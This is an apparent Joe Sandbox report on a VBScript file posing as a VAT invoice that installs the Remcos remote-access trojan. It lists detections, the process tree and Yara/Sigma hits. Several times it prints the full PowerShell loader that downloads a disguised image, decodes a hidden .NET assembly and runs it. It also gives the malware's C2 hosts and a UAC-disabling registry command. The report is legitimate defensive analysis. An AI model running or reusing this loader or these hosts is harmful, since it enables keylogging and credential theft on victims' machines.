Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LbtytfWpvx.vbs

Overview

General Information

Sample name:LbtytfWpvx.vbs
renamed because original name is a hash value
Original sample name:4dd53bc42716f9abe36ae85c8ca8ea4b_m_Factura de IVA,pdf.vbs
Analysis ID:1578245
MD5:4dd53bc42716f9abe36ae85c8ca8ea4b
SHA1:aa44fc15455a5283e6596a4da7ee87ac4e4b8901
SHA256:d2256247fae569fdaf99ce1a41dc036c5e4ca7b637a52314f51b726e39096573
Tags:vbsuser-adrian__luca
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7272 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7804 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 8040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 8048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • wscript.exe (PID: 2084 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • wscript.exe (PID: 7860 cmdline: wscript.exe C:\ProgramData\talpe.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 6800 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "dim.remofficialws.top:23101:1", "rem.officialswvrem.top:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghdzxtrswtwg-BJ2KPV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 16 entries
              SourceRuleDescriptionAuthorStrings
              12.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                12.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  12.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    12.2.MSBuild.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6b6f8:$a1: Remcos restarted by watchdog!
                    • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                    12.2.MSBuild.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x65a04:$str_b2: Executing file:
                    • 0x6683c:$str_b3: GetDirectListeningPort
                    • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x66380:$str_b7: \update.vbs
                    • 0x65a2c:$str_b9: Downloaded file:
                    • 0x65a18:$str_b10: Downloading file:
                    • 0x65abc:$str_b12: Failed to upload file:
                    • 0x66804:$str_b13: StartForward
                    • 0x66824:$str_b14: StopForward
                    • 0x662d8:$str_b15: fso.DeleteFile "
                    • 0x6626c:$str_b16: On Error Resume Next
                    • 0x66308:$str_b17: fso.DeleteFolder "
                    • 0x65aac:$str_b18: Uploaded file:
                    • 0x65a6c:$str_b19: Unable to delete:
                    • 0x662a0:$str_b20: while fso.FileExists("
                    • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 7 entries
                    SourceRuleDescriptionAuthorStrings
                    amsi64_7320.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi64_7908.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 8048, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , ProcessId: 2084, ProcessName: wscript.exe
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8048, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 8048, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" , ProcessId: 2084, ProcessName: wscript.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ProcessId: 7272, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7320, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs", ProcessId: 7804, ProcessName: cmd.exe
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, 